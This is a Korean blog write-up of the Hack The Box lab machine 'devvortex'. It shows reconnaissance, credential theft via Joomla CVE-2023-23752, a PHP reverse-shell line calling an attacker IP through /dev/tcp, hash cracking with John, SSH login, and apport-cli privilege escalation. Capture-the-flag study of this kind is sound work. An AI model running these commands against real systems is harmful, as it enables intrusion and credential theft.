Oh! JUN
[Hack The Box] devvortex 본문
1. 정보 수집
1.1. nmap를 활용한 스캔
nmap -sV 10.10.11.242 -T5
| IP Address | Ports Open |
| 10.10.11.242 | TCP: 22, 80 |
1.2. 디렉토리와 서브도메인 찾기
dirsearch -u http://devvortex.htb/
dirsearch 도구를 사용해서 웹 사이트에 존재하는 여러가지 디렉터리를 찾았는데 도움이 될만한 정보는 없음.
gobuster dns -d devvortex.htb -w subdomains-top1million-20000.txt -t 100
서브 도메인 주소를 확인해봤으나 확인이 안됨.
ffuf -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200
ffuf 도구를 사용해서 도메인 주소를 찾아봄. 여기서는 'dev' 즉 'dev.devvortex.htb' 서브 도메인이 발견됨.
-u : 공격 대상 주소
-H : HTTP 요청 헤더
FUZZ : wordlist를 대입할 위치
-mc : 응답 코드
GitHub - ffuf/ffuf: Fast web fuzzer written in Go
Fast web fuzzer written in Go. Contribute to ffuf/ffuf development by creating an account on GitHub.
github.com
dirsearch -u http://dev.devvortex.htb/서브 도메인 주소에 존재하는 디렉터리 정보를 찾아봄. '/administrator' 확인을 안해볼수가 없음.
2. 초기 접근
2.2. 'CVE-2023-23752' 을 통한 ID, PW 탈취
http://dev.devvortex.htb/administrator/
| 'Joomla'는 PHP로 작성된 오픈 소스 저작물 관리 시스템으로, MySQL 데이터베이스를 이용해 웹상에서 다양한 컨텐츠를 관리, 보관, 출판할 수 있는 기능을 갖고 있다. 라이선스는 GPL이며 다양한 언어를 함께 지원한다. |
'Joomla' cve 있는지 구글링 해봄.
'CVE-2023-23752' 웹 서비스에 무단 접근이 가능하다고 함. 구글링해서 적용된 exploit 알아봄.
GitHub - K3ysTr0K3R/CVE-2023-23752-EXPLOIT: A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 th
A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7 - K3ysTr0K3R/CVE-2023-23752-EXPLOIT
github.com
wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT/main/CVE-2023-23752.py
'CVE-2023-23752.py" exploit 코드를 다운받음.
python3 CVE-2023-23752.py -u http://dev.devvortex.htb
공격 대상을 "http://dev.devvortex.htb"로 지정해서 exploit을 실행함. Username : lewis, logan / Password : P4ntherg0t1n5r3c0n## 확인 할 수 있음.
Username : lewis
Passwrod : P4ntherg0t1n5r3c0n##
Username : lewis로 로그인이 가능한 것을 확인할 수 있음.
2.3. php 템플릿에 reverse shell 삽입
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.63/4444 0>&1'");
[System - administrator Template - index.html]에 PHP reverse shell 코드를 삽입함.
|
nc -lvp 4444
공격자가 받을 4444 포트를 열어둠.
2.4. MySQL 접속해서 계정 알아보기
mysql -u lewis -p
| 'Joomla'는 PHP로 작성된 오픈 소스 저작물 관리 시스템으로, MySQL 데이터베이스를 이용해 웹상에서 다양한 컨텐츠를 관리, 보관, 출판할 수 있는 기능을 갖고 있다. 라이선스는 GPL이며 다양한 언어를 함께 지원한다. |
'Joomla'는 MySQL DB를 사용함. 그래서 mysql 연결을 시도해 봄.
show databases;
DB 정보를 조회해봄.
use joomla
show tables;
DB를 선택하고 tables 정보를 조회 해봄.
select * from sd4fg_users;
'sd4fg_users' 테이블 정보의 column을 모두 조회하면 'usrname'과 ' hash된 'password'를 확인할 수 있음.
2.5. Hash된 계정정보 크랙하기
sudo mousepad hash.txt
username:password를 'hash.txt' 텍스트 파일에 저장함.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john 도구를 사용해서 hash.txt 파일을 크랙할 수 있음. 그 결과 logan:tequiermucho 확인할 수 있음.
ssh logan@10.10.11.242
크랙해서 얻은 username, password를 통해 ssh 연결을 시도함.
cat user.txt
user.txt정보를 확인하여 flag를 얻을 수 있음.
3. 권한 상승
3.1. 'CVE-2023-1326' 을 통한 권한 상승
sudo -l
현재 사용자가 사용할 수 있는 sudo 권한을 확인하고 /usr/bin/apport-cli 대한 취약점이 있는지 구글링 해봄.
(CVE-2023–1326)[Privilege Escalation] apport-cli 2.26.0 | VK9 Security
(CVE-2023–1326)[Privilege Escalation] apport-cli 2.26.0 by Vry4n_ | Jan 14, 2024 | Privilege Escalation | A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to
vk9-sec.com
해당 사이트에서 권한 상승할 수 있는 취약점을 찾을 수 있음.
sudo /usr/bin/apport-cli --file-bug
Please choose : 1
Please choose : 2
Please choose : V
find / -name "root.txt" 2>/dev/null
root 권한으로 상승되고, root.txt파일에서 flag 정보를 확인할 수 있음.
'문제풀이 > Hack The Box' 카테고리의 다른 글
| [Hack The Box] bizness (0) | 2024.02.19 |
|---|---|
| [Hack The Box] codify (0) | 2024.02.16 |
| [Hack The Box] analytics (0) | 2024.02.14 |
| [Hack The Box] cozyhosting (0) | 2024.02.13 |
| [Hack The Box] Keeper (1) | 2024.02.08 |
